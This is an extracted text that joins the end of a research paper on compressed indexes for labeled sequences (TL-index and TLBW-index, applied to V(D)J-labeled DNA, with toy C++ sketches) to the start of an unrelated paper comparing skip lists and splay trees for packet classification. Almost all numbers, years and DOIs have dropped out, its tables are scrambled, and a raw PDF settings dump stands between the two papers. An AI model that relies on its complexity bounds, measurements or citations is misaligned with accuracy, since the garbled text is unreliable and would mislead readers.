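the construction and the countpl mechanism can be illustrated end to end on the running example. the sketch below (standard c++17, toy scale) is a simplification of the paper's structures: the suffix ordering and the bwt are obtained by plain sorting instead of ropebwt, the labels are kept in that order in a plain array d (here, the label of the text position where each sorted suffix starts) instead of the bd/wd pair, occ() is a linear scan, and the labeling is invented; the backward search itself follows the textbook fm-index procedure.

// end-to-end toy of the countpl idea (standard c++17, no sdsl-lite).
#include <algorithm>
#include <iostream>
#include <map>
#include <numeric>
#include <string>
#include <vector>

int main() {
    std::string t = "aacagc$atcaac$agcttt$";         // running example text
    std::vector<std::string> a = {                    // hypothetical labels, one per letter
        "l1", "l1", "l1", "l2.1", "l2.1", "l2.1", "e",
        "l3", "l3", "l3", "l1", "l1", "l1", "e",
        "l1", "l1", "l1", "l4", "l4", "l4", "e"};
    std::size_t n = t.size();

    std::vector<std::size_t> sa(n);                   // suffix ordering by direct comparison (toy scale)
    std::iota(sa.begin(), sa.end(), 0);
    std::sort(sa.begin(), sa.end(),
              [&](std::size_t x, std::size_t y) { return t.substr(x) < t.substr(y); });

    std::string bwt(n, ' ');
    std::vector<std::string> d(n);                    // labels in the order of the sorted suffixes
    for (std::size_t k = 0; k < n; ++k) {
        bwt[k] = t[(sa[k] + n - 1) % n];
        d[k] = a[sa[k]];
    }

    std::map<char, std::size_t> c;                    // c[x] = number of characters smaller than x
    for (char ch : t) ++c[ch];
    std::size_t acc = 0;
    for (auto& [ch, cnt] : c) { std::size_t tmp = cnt; cnt = acc; acc += tmp; }

    auto occ = [&](char ch, std::size_t k) {          // occurrences of ch in bwt[0..k), linear scan
        return static_cast<std::size_t>(std::count(bwt.begin(), bwt.begin() + k, ch));
    };

    auto find_range = [&](const std::string& p) {     // backward search: suffixes starting with p
        std::size_t lo = 0, hi = n;
        for (auto it = p.rbegin(); it != p.rend() && lo < hi; ++it) {
            lo = c[*it] + occ(*it, lo);
            hi = c[*it] + occ(*it, hi);
        }
        return std::make_pair(lo, hi);
    };

    auto count_pl = [&](const std::string& p, const std::string& lx) {
        auto [lo, hi] = find_range(p);                // then count the labels inside the range
        return std::count(d.begin() + lo, d.begin() + hi, lx);
    };

    // with this labeling, "agc" starts at text positions labeled l2.1 and l1
    std::cout << "countpl(agc, l1) = " << count_pl("agc", "l1") << "\n";
    std::cout << "countpl(agc, l4) = " << count_pl("agc", "l4") << "\n";
}

the real index replaces the plain array by the compressed bit vector bd and the wavelet tree wd, which is what lets countpl and findpl touch only the positions carrying the requested label.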
to make bd, we need to read the labels in the order of the original data file in o(n) time. to make wa, we find the occurrence of each label, corresponding to a -bit in ba, in o(a) time. then we form the shape of wa in o(l). the labels corresponding to a -bit are extracted to make the wt’s root q . for each node containing at least two labels, we separate them by following the shape previously calculated, in o a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� � . we build wd the same way. the tl-index has thus a size of nhk(t) + nh (ba) + a h (a′) + o(n log l) bits, assuming s = o(l), and is built in o n þ l þ a log l= ffiffiffiffiffiffiffiffiffiffi log a p� �� � time. the tlbw-index has a size of nhk(t) + d h (d′) + o(n log l) bits and is built in o n þ l þ d log l= ffiffiffiffiffiffiffiffiffiffi log d p� �� � time. shaping the wt for a label hierarchy labels may be further organized into a label hierarchy, given an additional set f = {f , : : : , ff - } of label families (fig. a). both tl- and tlbw-indexes can be adapted: the wt w (either wa or wd) will be shaped according to the hierarchy, and internal nodes q of w may have non-empty q.label values belonging to f. for example, in fig. b, one can set on either index q .label = l , where l is the label family gathering l . , l . and l . . the findl() and findpl() queries naturally extend to label families. with the hierarchy depicted in fig. , findl(l ) has to find the positions that have a label l . , l . or l . . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such a query does not need to be iterated on every label of the family l , but rather directly starts at the corresponding internal node (q on fig. b). shaping w for a label hierarchy may increase the height w of the wt to o(l) in the worst case. to have a lower space consumption and a faster average query time, one can give a huffman shape to w (huffman, ). a leaf which corresponds to a frequently used label will be higher in the tree than a leaf of a rarely used label. depending on the label hierarchy, the average height of the tree is h (a′) in the best case while in the worst case it could be o(l). if no label hierarchy is given, the average height w will be h (a′) (mäkinen & navarro, ). results and discussion ht-index: a baseline index we compared the tl- and tlbw-indexes with a baseline solution called ht-index, indexing the text t with a bwt. the labels are stored in a map linking each label to the list of its (start,end) positions. we also store the labels in the text order with the compressed bit vector ba and, stored in plain form, a′. this enables the findl(lx) query in o(y), where y′ is the list of pairs (start,end) which represent the occurrences and y = jy′j. note that y (in the tl-index) and y′ represent the same information as the labels are stored in the text order in both indexes. the label(ti) query runs in o( ) time. this solution is not space-efficient with repeated labels: it needs nhk(t) + nh (ba) + a + l′ + o(n) bits, where a is the size of a′ and l′ the number of labeled factors. the query times are summarized in table . evaluation procedure the three indexes were implemented in c++. we used the sdsl-lite library (gog et al., ) to build the bit vectors and the wt. we used the ropebwt library (li, ), which builds a bwt in o(n log n) time on small dna sequences, as it is very efficient for storing and appending sequences corresponding to our projected application (cox et al., ). 
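the huffman shaping mentioned above can be computed with the classic bottom-up merge of the two least frequent subtrees. the sketch below (standard c++, with invented label frequencies; in the index they would be the occurrence counts of each label in a′ or d′) only derives the resulting shape, i.e. the root-to-leaf paths that the wavelet-tree bit vectors would then follow.

// bottom-up huffman shaping of the label tree (standard c++; frequencies are invented).
#include <iostream>
#include <map>
#include <memory>
#include <queue>
#include <string>
#include <vector>

struct Node {
    std::string label;                     // non-empty only on leaves
    long freq;
    std::unique_ptr<Node> left, right;
};

static void print_paths(const Node* n, const std::string& path) {
    if (!n->left && !n->right) {
        std::cout << n->label << " -> " << (path.empty() ? "-" : path) << "\n";
        return;
    }
    print_paths(n->left.get(), path + "0");
    print_paths(n->right.get(), path + "1");
}

int main() {
    // hypothetical label frequencies, i.e. numbers of occurrences in a' (or d')
    std::map<std::string, long> freq = {{"e", 50}, {"l1", 30}, {"l2.1", 10}, {"l3", 6}, {"l4", 4}};

    auto cmp = [](const Node* x, const Node* y) { return x->freq > y->freq; };
    std::priority_queue<Node*, std::vector<Node*>, decltype(cmp)> pq(cmp);
    for (const auto& [lab, f] : freq) pq.push(new Node{lab, f, nullptr, nullptr});

    while (pq.size() > 1) {                // repeatedly merge the two rarest subtrees
        Node* x = pq.top(); pq.pop();
        Node* y = pq.top(); pq.pop();
        pq.push(new Node{"", x->freq + y->freq,
                         std::unique_ptr<Node>(x), std::unique_ptr<Node>(y)});
    }
    std::unique_ptr<Node> root(pq.top());
    print_paths(root.get(), "");           // frequent labels get short root-to-leaf paths
}

with these frequencies the empty label and l1, which cover most positions, end up one or two bits from the root, while l3 and l4 sit deeper, which is exactly the trade-off described above.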
as ropebwt does not sample the suffix array, we iterate over the text until we find a $ symbol. to have results close to the usual fm-index sampling in o(log + n) steps, we use sequences of length , which is similar to the sampling distance usually chosen in practice. the real files have longer sequences, thus longer sampling distances. the queries relying on the bwt will be slower and therefore cannot be compared between real and simulated files. we build the ba (or bd) bit vectors, compress them using the rrr_vector l l l . l . l . l a l . l . l . l q : family l q : family l b figure a label n-ary hierarchy (a) can be represented with a binary tree shaping the wavelet tree (b). the label family l has here three descendants, l . , l . and l . . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ class of sdsl-lite, and finally build wa (or wd) using a shape we added in sdsl-lite, which depends of the label hierarchy. we evaluated the build time, the index size, as well as the run time of three of the queries detailed in “queries”—findp(p) behaving similarly in all indexes and countpl(p, lx) being very similar to findpl(p, lx). the three indexes were tested on various datasets of labeled texts, each with m characters (table ). datasets and code are available at http://www.vidjil.org/data/# -peerjcs. � simulated files with random sequences and random labels. all sequences and labels are random (d ∼ . n). � simulated files, with random sequences but fixed labels. here a given label is associated to the same pattern, possibly with some variation, and we alter the proportion of labeled letters ( – %), the variation in the label’s pattern ( – %, more variations giving random labels), the number of unique labels ( – , ), the length of the labels ( – letters). the dataset has files, two of those files are shown in table . � genomic sequences with immunologic labels. a person’s immune system can be described with a set of labeled dna sequences with v(d)j recombinations. the dataset, detailed below, uses k labels from unique labels, with d ∼ . n. a dataset of dna sequences with immunologic labels the adaptive immunity is the mechanism thanks to which our body defends itself against infections. when b and t-cells, or lymphocytes, are under maturation, their dna undergo a recombination which allows several billions possibilities from a register of a thousand genes (tonegawa, ). for example, the v(d)j recombination v � /acgt/ j � means that the dna sequence is composed from the v � gene without the four last letters, then the acgt sequence, then the j � gene. a person’s immune system can thus be described with a set of labeled dna sequences encoding v(d)j recombinations (fig. ). these sequences can be sampled by next- generation sequencing with bioinformatics analysis (bystry et al., , duez et al., ). the tested dna sequences come from patients , , and from a public dataset on a study on acute lymphoblastic leukemia (salson et al., ). they have m letters table query time complexities for ht-index, tl-index and tlbw-index. 
requests ht-index tl-index tlbw-index label(i) o( ) o(log l) o(log + n + log l) findp(p) o(jpj + occp � log + n) findl(lx) o(y) o(y � log l) o(y � (log l + log + n)) countpl(p, lx) o(jpj + occp � log + n) o(jpj + occp � (log + n + log l)) o(jpj + jzj � log l) findpl(p, lx) o(jpj + jzj � log l + y � log + n) note: note that we have jzj � y � occp. the label(i) and findl(lx) queries are faster in the ht-index and the tl-index as the ht-index needs a sampling time. however, the countpl(p, lx) and findpl(p, lx) are faster in the ht-index. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.vidjil.org/data/# -peerjcs http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and k labels from unique labels, making a mb file. each dna sequence has between and letters and two or three labels, each label having a size between and letters (fig. ). for a given label, the labeled subsequences may vary up to % due to amplification and sequencing errors. results index sizes. the table shows the results. as expected, the size of u, b (either ba or bd) and w (either wa or wd) grows linearly with the number of indexed elements (data not shown). the tl-index is the smallest index, and the tlbw-index is generally slightly larger. the compression is directly related to a and d. the file with random labels (d = . n) is hard to compress, whereas the files with a low d/n ratio give a � to � compression. figure further shows how these sizes vary: as expected, the indexes are larger when there are less consecutive identical labels in t or in u, thus more -bits in b. table size, build and query times of three indexes indexing labeled texts, on three simulated files and on a genomic dna sequence file with immunologic labels. random fixed # fixed # genomic sequence size lab. (t/u) . m / , m / m / k / lab. avg size . . lab. letters (%) variation (%) ?? a = : : : /d = : : : . n/ . n . n/ . n . n/ . n . n/ . n tl tlbw ht tl tlbw ht tl tlbw ht tl tlbw ht size (mb) time (s) . . . . . . label(ti) (ms) . . . . . . . . . . . . findl(l) (ms/l) . . . . . . . . . . . findpl(p, l) (s) . . . . . . . . . . . . notes: all files have m characters, and differ by the number of total and unique labels (“lab (t/u)”) and their size (“lab. avg size”), by the ratio of labeled letters (“lab. letters”), and by the variation between sequences labeled by the same label (“variation”). queries use patterns p with three letters. times were averaged on m launches (label()) or at least five launches (other queries). times for findl(l) are reported per letter. best or close-to-the-best results are in bold. a g g t c a a t a c g a t g a c t g g g g t c a g c t c a t a c g t c a g g a g g v - * v - * d * j - * j - * d: to v: to j: to sequence: to figure v(d)j recombinations. the first sequence is an immunoglobulin “light chain,” that is a vj recombination with two labels (one v gene, positions – , and one j gene, positions – ). the second sequence is a “heavy chain,” that is a v(d)j recombination. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ note that when there are more labeled letters, the text is more similar (as labels are placed on similar substrings), hence a decrease in the bwt size (a, c). w increases while the number of unique labels increases (d), the height of w increasing logarithmically with the number of unique labels. build time. 
most of the build time of tlbw-index is devoted to build d′. for tl-index, the building of u takes most of the total time. >trgv * : - trgj * : - ggaaggccccacagcgtcttcagtactatgactcctacaactccaaggttgtgttggaa (...) >ighv - * : - ighd - * : - ighj * : - ggaggtccctgagactctcctgtgcagcctctggattcaccttcagtgactactacatg (...) figure two annotated sequences from the dataset. full-size doi: . /peerj-cs. /fig- a b dc ht-index tl-index bwt ht-index tl-index tlbw-index bwt ht-index tl-index tlbw-index bwt ht-index tl-index tlbw-index bwt tlbw-index figure size of the indexes and size of the underlying bwt in the files with fixed labels. the additional size in tl- and tlbw-indexes mostly depends from the size of the compressed label sequences a′ and d′. they grow when there are more labeled letters (a), more variation in the labels (b), or when the number of distinct labels increase (d). note that when all the letters are labeled (a, %), there is a small decrease in the index size because there is no random letters between the patterns. the indexes shrink when the labels grow (c), as there are more common suffixes in the label sequences. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ queries. the label() query is faster on the ht-index. as expected, the tlbw-index needs more time for label() and findl(), as it needs to translate positions from the bwt back to the text. note that locating the positions in the text takes about the same time as label(ti) in the tl-index. however, for the complex findpl(p, l) query, the tlbw-index is the fastest solution because the position translation is only done on the letters which have both the label and the pattern. for the tl-index and ht-index, the actual time of the findpl(p, l) queries is more affected by the number of pattern occurrences than the number of final occurrences (between and k depending on the file). on the genomic dataset, the sequences are longer: the tlbw-index suffers here even more from the missing suffix array sampling of the implementation for queries label() and findl(). however, on the findpl(p, l) query, the other indexes are penalized due to the sparsity of the sampling, bringing a more than � difference with tlbw-index. conclusion the tl-index and tlbw-index store a labeled text and allow efficient queries. they can be constructed from files of some mb in a few seconds. experiments confirm that the indexes stay small when the text is redundant (thus a smaller u), when each label describes a pattern with few variations (many -bits in b, thus a smaller w), and when few letters are labeled (thus a small w). however, the tl-index and tlbw-index are robust even to non- redundant text with almost random labels everywhere. the tlbw-index needs more memory space than the tl-index but is more efficient in combined label/pattern queries. those structures might be used on any labeled data, such as dna sequences, but also on natural language texts or on music sheets with some semantic annotations. perspectives include improvement of the implementation, with label families queries or parameterizing the distance between samples in the fm-index to offer a space-time trade off. within sdsl we could use the sd_vector bit vector instead of the rrr_vector bit vector which should improve space consumption when the bit vectors are very sparse. 
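the rrr_vector/sd_vector trade-off just mentioned can be checked directly with sdsl-lite; the snippet below follows the library's documented usage (construction from a plain bit_vector, size_in_bytes, rank support) on an invented, very sparse bit vector, so the figures are only indicative.

// comparing the two compressed bit vector classes with sdsl-lite (illustrative;
// vector length and sparsity are invented, figures depend on the data).
#include <iostream>
#include <sdsl/bit_vectors.hpp>

int main() {
    const std::size_t n = 1000000;
    sdsl::bit_vector b(n, 0);
    for (std::size_t i = 0; i < n; i += 1000) b[i] = 1;   // a very sparse marking vector

    sdsl::rrr_vector<> rrrb(b);            // h0-compressed representation
    sdsl::sd_vector<>  sdb(b);             // elias-fano style, suited to sparse vectors

    std::cout << "plain: " << sdsl::size_in_bytes(b)    << " bytes\n";
    std::cout << "rrr  : " << sdsl::size_in_bytes(rrrb) << " bytes\n";
    std::cout << "sd   : " << sdsl::size_in_bytes(sdb)  << " bytes\n";

    // both representations support rank (and select), as needed for ba and bd
    sdsl::rrr_vector<>::rank_1_type rrr_rank(&rrrb);
    sdsl::sd_vector<>::rank_1_type  sd_rank(&sdb);
    std::cout << "rank1(500000) = " << rrr_rank(500000) << " / " << sd_rank(500000) << "\n";
}

on sparse marking vectors such as ba or bd, the sd_vector representation is expected to be the smaller of the two, in line with the perspective above.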
however, this would only minimally improve the global space consumption of the index. we plan to use one of the indexes in a clone database for hematological malignancies: it will allow comparison of v(d)j recombinations between different samples of a patient or between several patients. acknowledgements we thank anonymous reviewers for their insightful comments on earlier versions of this article, as well as the euroclonality-ngs consortium for insightful discussions. additional information and declarations funding this work was supported by université de lille, siric oncolille, and région hauts-de- france. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: université de lille, siric oncolille, and région hauts-de-france. competing interests the authors declare that they have no competing interests. author contributions � tatiana rocher conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. � mathieu giraud conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. � mikaël salson conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper. data availability the following information was supplied regarding data availability: code and data are available as supplemental dataset files and from http://www.vidjil. org/data/# -peerjcs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references arroyuelo d, claude f, maneth s, mäkinen v, navarro g, nguyen k, sirén j, välimäki n. . fast in-memory xpath search using compressed indexes. software: practice and experience ( ): – doi . /spe. . belazzougui d, cunial f, kärkkäinen j, mäkinen v. . linear-time string indexing and analysis in small space. arxiv preprint. available at http://arxiv.org/abs/ . . burrows m, wheeler dj. . a block-sorting lossless data compression algorithm. digital equipment corporation. src research report, . available at http://www.hpl.hp.com/ techreports/compaq-dec/src-rr- .pdf. bystry v, reigl t, krejci a, demko m, hanakova b, grioni a, knecht h, schlitt m, dreger p, sellner l, herrmann d, pingeon m, boudjoghra m, rijntjes j, pott c, langerak aw, groenen pjta, davi f, brüggemann m, darzentas n. . arrest/interrogate: an interactive immunoprofiler for ig/tr ngs data. bioinformatics ( ): – doi . /bioinformatics/btw . cox aj, bauer mj, jakobi t, rosone g. . large-scale compression of genomic sequence databases with the burrows–wheeler transform. bioinformatics ( ): – doi . /bioinformatics/bts . duez m, giraud m, herbert r, rocher t, salson m, thonier f. . vidjil: a web platform for analysis of high-throughput repertoire sequencing. plos one ( ):e doi . /journal.pone. . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://www.vidjil.org/data/# -peerjcs http://www.vidjil.org/data/# -peerjcs http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /spe. http://arxiv.org/abs/ . 
http://www.hpl.hp.com/techreports/compaq-dec/src-rr- .pdf http://www.hpl.hp.com/techreports/compaq-dec/src-rr- .pdf http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ferragina p, manzini g. . opportunistic data structures with applications. in: foundations of computer science (focs ). piscataway: ieee, – . available at https://people.unipmn. it/manzini/papers/focs draft.pdf. gog s, beller t, moffat a, petri m. . from theory to practice: plug and play with succinct data structures. in: symposium on experimental algorithms (sea ). – . grossi r, gupta a, vitter j. . high-order entropy-compressed text indexes. in: symposium on discrete algorithms (soda ). – . new york: acm. huffman da. . a method for the construction of minimum-redundancy codes. proceedings of the ire ( ): – . kärkkäinen j, ukkonen e. . lempel-ziv parsing and sublinear-size index structures for string matching. in: south american workshop on string processing (wsp ). li h. . fast construction of fm-index for long sequence reads. bioinformatics ( ): – doi . /bioinformatics/btu . mäkinen v, navarro g. . run-length fm-index. in: proceedings of the dimacs workshop: the burrows-wheeler transform: ten years later. – . mäkinen v, navarro g. . succinct suffix arrays based on run-length encoding. in: combinatorial pattern matching (cpm ). – . mäkinen v, navarro g. . rank and select revisited and extended. theoretical computer science ( ): – doi . /j.tcs. . . . munro ji, navarro g, nekrich y. . space-efficient construction of compressed indexes in deterministic linear time. in: symposium on discrete algorithms (soda ). – . munro ji, nekrich y, vitter js. . fast construction of wavelet trees. theoretical computer science : – doi . /j.tcs. . . . navarro g, mäkinen v. . compressed full-text indexes. acm computing surveys (csur) ( ): doi . / . . raman r, raman v, rao ss. . succinct indexable dictionaries with applications to encoding k-ary trees and multisets. in: symposium on discrete algorithms (soda ). – . salson m, giraud m, caillault a, ferret y, duployez n, duez m, sebda s, quief s, villenet c, figeac m, preudhomme c, grardel n. . high-throughput sequencing in acute lymphoblastic leukemia: follow-up of minimal residual disease and emergence of new clones. leukemia research : – doi . /j.leukres. . . . tonegawa s. . somatic generation of antibody diversity. nature ( ): – doi . / a . rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://people.unipmn.it/manzini/papers/focs draft.pdf https://people.unipmn.it/manzini/papers/focs draft.pdf http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.leukres. . . http://dx.doi.org/ . / a http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ indexing labeled sequences introduction materials and methods results and discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . 
submitted march accepted june published july corresponding author mahdi abbasi, abbasi@basu.ac.ir academic editor sándor szénási additional information and declarations can be found on page doi . /peerj-cs.
copyright khezrian and abbasi distributed under creative commons cc-by . open access comparison of the performance of skip lists and splay trees in classification of internet packets navid khezrian and mahdi abbasi computer engineering faculty, sharif university of technology, tehran, iran department of computer engineering, engineering faculty, bu-ali sina university, hamedan, iran abstract due to the increasing number of internet users and the volume of information exchanged by software applications, internet packet traffic has increased significantly, which has highlighted the need to accelerate the processing required in network systems. packet classification is one of the solutions implemented in network systems. the most important issue is to use an approach that can classify packets at the speed of the network and show optimum performance in terms of memory usage. in this study, we evaluated the performance in packet classification of two of the most important data structures used in decision trees, i.e., the skip list and the splay tree. our criteria for performance were the time of packet classification, the number of memory accesses, and memory usage. these criteria were tested using acl and ipc rule sets of different sizes as well as different numbers of packets. the results of the evaluation showed that the performance of skip lists is higher than that of splay trees. by increasing the number of classifying rules, both the difference in the speed of packet classification and the superiority of the performance of the skip list over that of the splay tree become more significant. the skip list also maintains its superiority over the splay tree in lower memory usage. the results of the experiments confirm the scalability of this method in comparison to the splay tree method. subjects algorithms and analysis of algorithms, computer networks and communications keywords skip list, splay tree, firewall, memory, time, performance introduction the internet is the largest packet-switching network. in this network, information is transmitted in the form of packets from the source to the destination. with the increase in the number of users and the volume of information exchanged by applications, internet packet traffic has increased significantly. for this reason, in order to accelerate the processing required in network systems such as routers, a basic process called packet classification is used (baboescu & varghese, ; taylor, ; perez et al., ). classification of network packets refers to separating the different streams of packets that pass through network systems (bontupalli et al., ; harada, tanaka & mikawa, ; inoue et al., ; li et al., ; bi, luo & sun, ). many network systems rely on packet routing and forwarding policies, together with fast enforcement of packet classification policies, to carry out traffic management (li et al., ; lin et al., ; tessier et al., ). using these basic processes, packet flow
processing has become possible at a very high speed, and the same rules can be applied to all packets belonging to the same traffic stream (comer, ). network applications that require packet classification are of three types, i.e., security operations, traffic management and quality of service (qos), and policy-based routing. several studies have analytically or experimentally benchmarked the different packet classification algorithms (gao, tan & gong, ; qi et al., ; lim, ; nagpal et al., ). a commonly accepted categorization of the packet classification algorithms is the one presented by taylor ( ). according to this categorization, packet classification algorithms fall into four classes, which are explained below. exhaustive search in this type of algorithm, all elements within a list are checked to match the search query argument. the main disadvantage of these algorithms is the linear dependence of time complexity on the number of filters (trabelsi & zeidan, ). decomposition in decomposition-based algorithms, two processing steps are followed. in the first step, the search is performed individually on the filter set based on each field. in the second step, the results of all searches on the different fields are merged through intersection (neji & bouhoula, ). therefore, it is obvious that these algorithms have great potential for parallelism. however, the large size of the data structures required in these algorithms makes them inefficient in terms of memory usage. tuple spaces in this method, the filters are divided by the number of bits specified in the prefixes of the search query, and the search space is thus partitioned into several sub-spaces. during classification, the input packets are matched and checked against the generated tuples using a simple or tree-based search algorithm on the prefix fields of interest (kirschenhofer, martínez & prodinger, ). when a packet matches a tuple, only the filters in the equivalence set of that tuple are evaluated against the remaining fields of the packet. the memory complexity of these algorithms is less than that of the decomposition-based algorithms (srinivasan, suri & varghese, ). decision tree in these algorithms, the set of filters is stored in search trees based on the binary patterns in the prefix fields of the filters. to make a decision tree based on several fields, a tree is created in which the leaves contain a specified filter or a subset of filters that have an intersection in the prefix traversed from the root to the leaves. in these algorithms, the best filter corresponding to the input packet is found through the binary contents of the fields in question on the search tree (sen, ). the existing methods have not been able to balance time and memory consumption. on the other hand, binary trees work well when the elements arrive in random order, but they become inefficient in cases where the operations are sequential. tree algorithms use different data structures for searching. two of the most important data structures of decision trees are the splay tree (sleator & tarjan, ) and the skip list (kaufmann, ). the performance of a splay tree depends on the history of accesses to its elements. on the other hand, the performance of a skip list depends on an independent randomization of the height of the links that lead to specific elements.
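to make the contrast concrete, the following c++ sketch shows node layouts of the kind implied by the descriptions in the algorithms and tools section below; the type and field names are illustrative assumptions rather than the authors' implementation.

#include <vector>

// illustrative splay-tree node for one packet-header field: it stores a boundary
// value, the ids of the rules whose range covers that value, and a hit counter;
// rotations later move frequently matched nodes towards the root.
struct SplayNode {
    unsigned value = 0;             // lower or upper boundary taken from a rule
    std::vector<int> ruleIds;       // rules whose range contains this value
    unsigned hits = 0;              // how many packets have matched this node
    SplayNode *left = nullptr, *right = nullptr, *parent = nullptr;
};

// illustrative skip-list node for the same purpose: instead of rebalancing by
// rotations, each node carries a randomly sized tower of forward pointers.
struct SkipNode {
    unsigned value;
    std::vector<int> ruleIds;
    std::vector<SkipNode*> forward; // forward[i] = next node at level i
    SkipNode(unsigned v, int level) : value(v), forward(level + 1, nullptr) {}
};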
therefore, probabilistic methods are used to analyze the operation of splay trees and skip lists. we refer the reader to references (papadakis, ; pugh, ; sen, ; papadakis, ; kirschenhofer, martínez & prodinger, ) for probabilistic analysis of the complexity of these algorithms. in this paper, we intend to evaluate and compare the performance of packet-classifying tree algorithms using these two different data structures. for this purpose, we will use the criteria of time complexity and memory complexity. time complexity depends on the number of algorithmic references to memory needed to classify each packet, and memory complexity depends on the amount of memory used by the data structure of the algorithm. the structure of the paper is organized as follows. first, we review the history of packet-classifying tree algorithms and related previous works for evaluating their performance. the third section describes the general structure of the tree algorithms based on skip lists and splay trees along with their implementation. in the fourth section, after introducing the tools used to produce filters and packets, the evaluation criteria are presented and the results of the evaluation of the performance of the two approaches are compared. the final section draws conclusions and indicates directions for further research. background the main aim of the paper is to compare the performance of the skip list and splay tree data structures when adapted to multidimensional search on the rule set of a packet classifier. the nature of search, insertion, and update in such data structures lets tree-based packet classifiers reduce the number of memory accesses required during search and hence reduce the complexity of classification. a review of recent research suggests that no study so far has been conducted to make an in-depth comparison of the performance of packet-classifying tree algorithms operating with skip lists and splay trees. previous works simply aimed at optimizing these algorithms without comparing their performance. pan et al. ( ) used the skip list to improve the time performance of information retrieval algorithms in local lists. in their design, given that a packet might share a prefix with previous packets, search in the skip list starts from the closest node previously obtained from this prefix. therefore, a significant amount of time is saved. extensive evaluations show that their design can triple the speed of the original design on a -bit machine. in , trabelsi et al. ( ) proposed a multi-stage and dynamic packet filtering mechanism to enhance the performance of the firewall. their proposed mechanism is implemented by splay tree filters and uses traffic features to minimize packet filtering time. it can decide whether or not dynamic updates of the splay tree filters are needed to filter the next network traffic window and predict the best customized pattern for the tree. in this method of input packet filtering, the initial acceptance of the packet is done using a splay tree data structure, which is dynamically updated according to the traffic streams of the network. as a result, frequent packets have less memory access and, therefore, the total packet filtering time is reduced. in , zhong, geng & zhao ( ) focused on a simple and very important form of the remote authentication problem.
in this form, membership requests for a dynamic set of n data elements which are stored in unknown directories are verified. in their study, some of the available methods for confirming membership requests such as the merkle hash tree, skip list, and rsa tree were examined for the first time. in all of these methods, the data structures used by the algorithm to update the data are not fast enough and may have a high complexity time. it could also be possible to reconstruct a range of data structures during the update process. therefore, they used the b+ tree data structure with rsa accumulators for the authentication scheme, which requires lower computational costs for membership queries in a dynamic data set. trabelsi & zeidan ( ) provided in a mechanism to improve the filtering time of firewall packets by optimizing the comparison order of the matched security-rule fields to decide on the early rejection of incoming packets. their proposed mechanism was based on changing the order of filtering fields according to traffic statistics. it also allowed to use multi-level classifying filters. therefore, their proposed mechanism can be considered as a mechanism for protecting the device against denial-of-service attacks (dos). early packet acceptance is accomplished through the use of splay trees and changes dynamically with respect to traffic streams. therefore, frequent packets have less memory access, thereby reducing the matching time. the purpose of their proposed method was to overcome some of the limitations of the previous technique called self-adjusting binary search on prefix length (sa-bspl). the numerical results of the simulation show that their proposed mechanism can improve the firewall performance in terms of total packet processing time compared to the sa-bspl method. zeidan & trabelsi ( ) in provided a mechanism to improve firewall performance through the rejection of denial-of-service attacks. to do this, they used a security policy of filtering as well as a statistical traffic plan that was implemented in the form of multi-level filter, splay tree, and hash tables. the proposed design rejects unwanted traffic and repetitive packets in the early stages and, therefore, less memory is used. as a result, packet matching time is generally reduced. the results of the evaluation of this method indicate that the proposed mechanism significantly reduces the processing time of dos traffic. trabelsi & zeidan ( ) explored firewall packet rejection techniques in . two of these techniques include fvsc and pber that introduce the concept of approximate policy instead of using the full policy provided by the administrator. the benefit of such policies is that they are quicker at evaluating and adapting to dynamic traffic. the third technique, which is called sa-bspl, uses the splay tree data structure. this data structure dynamically changes according to traffic behavior so that, when a node containing highly matching rules with packets is located close to the root, necessary actions on the packet are possible at a faster rate. these techniques allow the maximum number of packets to be processed as quickly as possible, thereby reducing the time of filtering process. khezrian and abbasi ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. neji & bouhoula ( ) presented a dynamic packet routing algorithm in . they considered a self-regulating tree by combining a binary search pattern on the prefix length with a splay tree. 
